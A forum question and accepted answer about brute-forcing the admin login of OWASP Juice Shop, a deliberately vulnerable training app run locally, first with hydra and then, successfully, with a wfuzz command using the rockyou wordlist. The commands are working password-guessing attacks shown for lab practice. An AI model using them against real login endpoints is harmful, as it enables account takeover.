# Hydra with OWASP juice-shop

Tags: security, owasp, hydra

I'm new in cybersecurity and I'm trying to hack the docker container juice-shop from OWASP as training:
[OWASP juice shop](https://pwning.owasp-juice.shop/).

I'm trying to brute force the login page with hydra, but hydra just  return 16 fake positives and I really don't understand why:

```
hydra 127.0.0.1 -s 3000  -l admin@juice-sh.op -P rockyou.txt http-post-form "/#/login:email=^USER^&password=^PASS^&loginButton=submit:F=Invalid email or password."
```

[fake positive hydra](https://i.stack.imgur.com/EhiNS.png)

I guess that could came from the login page that is a angular page . SPA must have some interaction problem with hydra but I don't really know.
Someone could help me understand what happened here?

I have tried to change the hydra command line changing parameters for 3hours:

```
hydra 127.0.0.1 -s 3000  -l admin@juice-sh.op -P rockyou.txt http-post-form "login:email=^USER^&password=^PASS^:F=Login"
```

I looked in the solution from OWASP. They didn't use hydra:
[OWASP solution](https://pwning.owasp-juice.shop/appendix/solutions.html)

I found password with sql injection but I would find it with brute-force and  Hydra , I would like understand why it's not working.

Answer (score 0, accepted):

I got some answers. Hydra don't look to be the appropriate tool to brute force with json payload. You could recode hydra script but I found wfuzz. I really prefer that tool and I found the password with that command:

```
wfuzz -c  -w /usr/share/wordlists/rockyou.txt -d "email=admin@juice-sh.op&password=FUZZ" 
-Z --sc 200 http://localhost:3000/rest/user/login
```

spoiler:

> you have to test at least the 100000 first password of rockyou dictionnary.